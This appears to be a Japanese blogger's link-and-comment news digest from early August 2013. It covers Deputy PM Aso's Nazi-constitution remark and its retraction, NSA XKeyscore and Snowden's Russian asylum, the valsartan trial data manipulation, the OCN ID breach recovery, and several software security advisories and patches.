》 憲法改正はナチスに学べ by 麻生副総理 (撤回はしたけれど)
橋下氏……
麻生氏ナチス発言:橋下共同代表「ブラックジョーク」 (毎日, 8/2)
8/1 報道ステーションで、共同通信提供の音声データが報道されてました。 当該発言に対しては、会場からは笑いが起きていたので、少なくとも会場ではブラックジョークとして認識されたように、私には聞こえました。
麻生ナチス発言にユダヤ激怒 テレビ「報道ステーション」 (今日の出来事, 8/2)
当然こうなる
ユダヤ団体、橋下大阪市長も批判 麻生氏発言で (共同, 8/2)。いつもの「サイモン・ウィーゼンタール・センター」。
「ブラックジョークだった」と擁護した日本維新の会共同代表の橋下徹大阪市長について、「ブラックジョークとして扱ってはならない事柄がある」と批判した。
まあ、そうなるわなあ。
「国際社会、敵に回す」 政権に麻生ショック (朝日, 8/2)
関連
社説:麻生氏ナチス発言 撤回で済まない重大さ (毎日, 8/2)
ナチス発言麻生財務相 どのツラ下げてG20に出るのか!? (日刊ゲンダイ, 8/2)
》 ウナギのことを何も知らずに食べる罪 東京大学農学生命科学研究科の海部健三・特任助教に聞く (日経ビジネス, 8/2)
》 警察における取調べの録音・録画の試行の検証について (警察庁, 7/31)
》 Announcing Version 2.2 of Mozilla’s CA Certificate Policy (Mozilla Security Blog, 7/31)
》 Mozilla は Web をセキュリティのプラットフォームとするための活動を続けています (Mozilla Japan ブログ, 7/30)。「Mozilla と BlackBerry がファジングで協力」「セキュリティテストプラットフォーム Minion を公開」。
関連: Mozilla、セキュリティテスト自動化フレームワーク「Minion」を発表 (sourceforge.jp, 7/31)
》 OCN IDによるサービス利用の再開について (NTT.com, 8/2)。OCN ID、ようやく復旧したようです。 ただし、 OCN会員サポート によると:
なお、以下の機能については引き続き停止しております。
・OCNメールアドレス/メールパスワードを忘れた場合の確認機能
また、コールセンタやホームページで承りましたお申し出(解約やメールアドレス変更など)に関して、処理が反映されていないケースがありますが、順次処理を進めておりますのでご了承ください。
あと、7/26 の 2 回目の侵入の前にパスワードを変えた人はまた変えないとまずいのかどうかですが、 Q. 二回目の不正アクセスがありましたが、再度パスワード変更をする必要がありますか? (NTT.com, 7/31) によると、
A. 二回目の不正アクセスでの流出は確認しておりませんが、パスワード変更は念のため実施くださいますようお願いいたします。
変えた方がよさげです。
Benjamin さん情報ありがとうございます。
》 NSA 方面 (PRISM、Verizon 通話記録収集等)
スノーデン氏、ロシアへ亡命 (期限は 1 年)
CIA元職員 ロシアが1年間亡命認める (NHK, 8/2)
CIA元職員「ロシアに感謝」 (NHK, 8/2)
米「ロシアの決定に深く失望」 (NHK, 8/2)
米 ロシアとの首脳会談見送りも検討へ (NHK, 8/2)。 とりあえず言ってみた。
ロシアがCIA元職員の一時亡命受け入れ、米「極めて残念」 (ロイター, 8/2)
スノーデン氏、潜伏 交際や住居提供の申し入れ相次ぐ (朝日, 8/2)
Chrome 28.0.1500.95 への Stable Channel Update (Google, 2013.07.30) に対応した Opera 15 stable update が出たそうです。
》 Global Threat Intelligence を使用したアルテミス誤検知について (マカフィー, 8/1)、Artemis false positive detections from Global Threat Intelligence (McAfee KB78993)。「北米で」誤検知してたらしい。 KB78993 では Workaround 1 として Quarantine Restore Tool の使用が挙げられている。 KB78993 からダウンロードできる。
》 オックスフォード英語辞典が「結婚」の定義変更へ 同性婚を含む記述に (みやきち日記, 7/30)
》 Microsoft、脆弱性情報の事前提供制度を刷新 パートナーとの連携拡充 (ITmedia, 7/30)
》 運転士は指令室と電話中、スペイン脱線事故で当局発表 (ロイター, 7/31)、スペイン列車事故の運転士、直前に携帯電話 (ウォール・ストリート・ジャーナル日本版, 7/31)。なんじゃそりゃ……。
》 Androidのroot権限はもう要らない? (slashdot.jp, 7/31)
》 裁判員 遺体写真で辞退認めることに (NHK, 8/1)
》 バルサルタン、東京慈恵会医科大学の臨床試験でもデータ捏造を確認
「Jikei Heart Study」に関する調査について(第2報;中間報告) (東京慈恵会医科大学, 7/30)、 中間報告書
患者カルテと論文データを照合した結果、本学研究チームが関与しない統計解析段階において、血圧値の一部に人為的なデータ操作がありました。
また、データ解析が製薬会社社員に全面的に委ねられていたこと、論文に記載された当該社員の所属が不正確であったことにより、利益相反が指摘されました。
調査委員会は、これらの一連の事実によって、論文の科学的信頼性が損なわれたと結論付けました。
本研究の統括責任者は、調査委員会の結論を真摯にうけとめ、自ら論文の撤回を申し出ることとなりました。調査委員会は、検証結果を学術誌ランセットに報告いたします。
降圧剤データ:慈恵医大も操作認める 論文撤回へ (毎日, 7/30)
研究に参加した医師らは「元社員がデータ解析をした。自分たちはデータ解析の知識も能力もなく、解析をしたことはない」などと口をそろえており、元社員による不正を推測した。一方、元社員は調査委に対して「思い当たらない。自分は関係していない」と関与を否定しているという。
高血圧の治療薬のタイプには、▽バルサルタンのように血管を拡張させる▽心臓の働きを抑える▽余分な水分などを体外に排出する−−などがある。バルサルタンは1日160ミリグラムの服用で年間約8万1650円かかるが、最も安いものなら約3500円で済む。健康保険が適用されても70歳以上だと1割を自己負担している。
バルサルタンが価格の割に使われてきたのは、臨床試験で効果を確かめたという論文を現場の医師が信じたためだ。医療政策に詳しい埼玉県済生会栗橋病院の本田宏医師は「論文通りのメリットがなければ、患者にもっと安価な降圧剤を処方するという選択肢もあったはず。患者には個人負担の増加、公的には医療費の増大をもたらしたという意味で、看過できない問題だ」と批判する。
東京慈恵医大でもデータ操作 (NHK, 7/30)
製薬会社社員がデータを操作か (NHK, 7/31)
関連
疑惑の薬 〜論文データ操作の闇〜 (NHK クローズアップ現代, 7/31)
一方、京都府立医大は、なぜ、製薬会社の社員を臨床研究に深く関与させたのか。
研究チームの責任者松原弘明元教授です。
ノバルティスファーマの制作した、「ディオバン」を宣伝するDVDに出演していました。
(中略)
松原元教授の研究室は、2009年からの4年間に、ノバルティスファーマから、合わせて1億円を超える寄付金を、研究費として受けていました。
寄付金は、多くの研究室が企業からもらっていますが、ノバルティスファーマからの額は、ほかの企業より、ぬきんでて多いものでした。
》 ドラマ『半沢直樹』は、あくまでファンタジー (ニューズウィーク日本版, 8/1)
と言いますか、この『半沢直樹』というドラマのストーリーラインは、別に現代が舞台である必要はなく、このまま『大岡越前』や『水戸黄門』の一回分にしても、全く違和感がないわけで、昭和どころか江戸時代の感覚と大差ないのかもしれません。
それ、ドラマとしては、基本に忠実ということだと思うけど。
》 NSA 方面 (PRISM、Verizon 通話記録収集等)
新たなプログラム XKeyscore の存在が明らかに
NSAのX-Keyscoreプロジェクトはインターネット上の誰のトラフィックでも収集できる (techcrunch, 8/1)
Snowdenは6月10日のGuardian紙に、“その人の個人的なメールアドレスが分かれば、誰でも、あなたでもあなたの会社の経理の人でも、連邦裁判所の判事でも、それに大統領でさえも、ネット上のトラフィックを盗聴できる”、と語っている。それは、このX-Keyscoreのことだったのだ。
米政府は、令状なしにメールが読めることに関して嘘をついていた (techcrunch, 8/1)
XKeyscoreを使ってNSAがあなたのメールを見る方法はこうだ。NSAのアナリストは、令状なしに、ただメールアドレスまたはIPアドレス、書面による「正当な理由」、および対象期間を提出する。それだけだ。(中略)
アナリストがXKeyscoreにメールを要求した後何が起きるのだろうか?Greenwaldはこう言う。「次にアナリストは、読みたいメールをNSAの読み取りソフトを使って開く」。文書によると、このソフトは米国を「通過」する通信、および米国で「終結」する会話を読むために使用する。問題の通信は海外が発信元であり、したがって憲法による保護に関係ないが、世界がこの弁解に納得するとは思えない。
NSAが極秘のスパイ事業XKeyscoreについて釈明 (techcrunch, 8/1)
XKeyscore: NSA tool collects 'nearly everything a user does on the internet' (Guardian, 7/31)
XKeyscore presentation from 2008 - read in full (Guardian, 7/31)
新たにその存在が明らかになった NSA のツール「XKeyscore」 (Sophos, 8/5)
》 “原発マネー”を31年拒否してきた島が緊急事態に (日刊 SPA!, 7/31)
「上関原発を建てさせない祝島島民の会」の清水敏保代表はこう語る。
「山口県漁協の職員は『10億8000万円を受け取っても受け取らなくても税金がかかる』とウソの脅しをかけるなど、補償金を何とか受け取らせようと圧力をかけてきました。そして、県漁協は今年2月に祝島支店での部会で強引に受け取りの可決をしたんです。漁業権にかかわる総会の議決は3分の2以上の同意がなければならないという決まりなのに、県漁協は半数以上の賛成で可決という認識。補償金を受け取るかどうかは、漁業権にかかわる重大な問題です。生態系が崩れて漁獲高に影響が出る可能性もあるし、風評被害も予想される。釣り客などの観光収入も減るでしょう。何よりも、われわれ反対を貫いてきた島民たちの思いは『海はカネには換えられん』ということです」
これに対して、今年3月に祝島漁協の組合員53人のうち31人と准組合員8人が「漁業補償は受け取らない」との署名を提出した。しかし、県漁協はこれを無視。8月2日17時から総会を開き、漁業補償金の分配案を決めるつもりだ。
発言詳細
麻生副総理の憲法改正めぐる発言の詳細 (朝日, 8/1)
昔は静かに行っておられました。各総理も行っておられた。いつから騒ぎにした。マスコミですよ。いつのときからか、騒ぎになった。騒がれたら、中国も騒がざるをえない。韓国も騒ぎますよ。だから、静かにやろうやと。憲法は、ある日気づいたら、ワイマール憲法が変わって、ナチス憲法に変わっていたんですよ。だれも気づかないで変わった。あの手口学んだらどうかね。
わーわー騒がないで。本当に、みんないい憲法と、みんな納得して、あの憲法変わっているからね。ぜひ、そういった意味で、僕は民主主義を否定するつもりはまったくありませんが、しかし、私どもは重ねて言いますが、喧噪(けんそう)のなかで決めてほしくない。
これは駄目でしょ……。ナチスのようにやっちまおうぜとしか読めないよ。 あと、騒ぎになったのは A 級戦犯合祀からでしょ。 マスメディアだけのせいにするのはよくない。
当然こうなる
韓国:麻生氏「独ワイマール改憲に学べ」発言を批判 (毎日, 7/31)
麻生氏講演:米のユダヤ系人権団体が抗議 (毎日, 7/31)、ナチス発言「世界に謝罪を」 米ユダヤ人人権団体副代表 (朝日, 8/1)。いつもの「サイモン・ウィーゼンタール・センター」。
麻生副総理:「国際的怒りを買った」と独紙 ナチス発言に (毎日, 8/1)
発言撤回
麻生氏、ナチス発言を撤回 「改憲の悪しき例上げた」 (朝日, 8/1)
さらに「私がナチスやワイマール憲法にかかわる経緯について極めて否定的にとらえていることは、全体の流れをみていただいたらはっきりしている」と語り、ナチス政権を肯定する立場ではないことを強調した。その後、同じ内容のコメントも発表した。
麻生氏が発表したコメント全文 (朝日, 8/1)
関連
軍オタ関連で文献読んだ者として。麻生発言で間違いなのは、全権委任法が「静かに」成立したいう点じゃないんしょうか。ナチス・ドイツの政権獲得1933から全権委任法まで2年、総統まで3年かかっており、政治殺人は数千人単位で起こってますよ。レームの粛正も含めてね。
— 石井孝明 (@ishiitakaaki) August 1, 2013
麻生発言はドイツなら「連邦刑法130条」(民衆扇動罪)が適用されるだろう。「公然とまたは集会で」「ナチスの暴力支配」を「賛美し又は正当化」したと判断されるからだ。「公共の平穏を乱した」として罰則は自由刑3年以下または罰金刑である。ナチズムに対する発言にはそれだけ厳しい対応がある。
— 有田芳生 (@aritayoshifu) August 1, 2013
ナチスに見習うようなことを口走る政治家には、まず国家ありき、という発想がある。その危険性にも目を向けるべき。
— 落合洋司 (@yjochi) August 1, 2013
》 EMET 4 日本語版ユーザー ガイドを公開しました (日本のセキュリティチーム, 8/1)。PDF 60 ページ。
【臨時配信】マカフィー サポート通信 - 2013/08/01 (マカフィー, 2013.08.01)。マカフィーのアプライアンス製品に複数の欠陥があるという話。Email Gateway/Email and Web Security/IronMail、Firewall Enterprise Series、SIEM / Nitro Series、Vulnerability Manager Series、Web Gateway Series。
関連: McAfee Email Gateway、Email and Web Security、Ironmail アプライアンスで使用されるサードパーティ製品の重大な脆弱性について (マカフィー, 2013.08.01)
phpMyAdmin 3.5.8.2 and 4.0.4.2 are released (phpMyAdmin, 2013.07.28)。PMASA-2013-8 〜 PMASA-2013-15 が修正されている。
Moodle Security Announce (moodle.org)。2013.07.15 付で MSA-13-0025 〜 MSA-13-0031 が公開されている。
mod_dav_svn assertion from requests against root path (subversion, 2013.07.25)。Subversion 1.8.1、1.7.11 で修正されている。 CVE-2013-4131
SYM13-007: Security Advisories Relating to Symantec Products - Symantec Encryption Management Server Web Email Protection XSS (Symantec, 2013.07.22)。Symantec Encryption Management Server 3.3.0 MP2 で修正されている。 CVE-2013-4674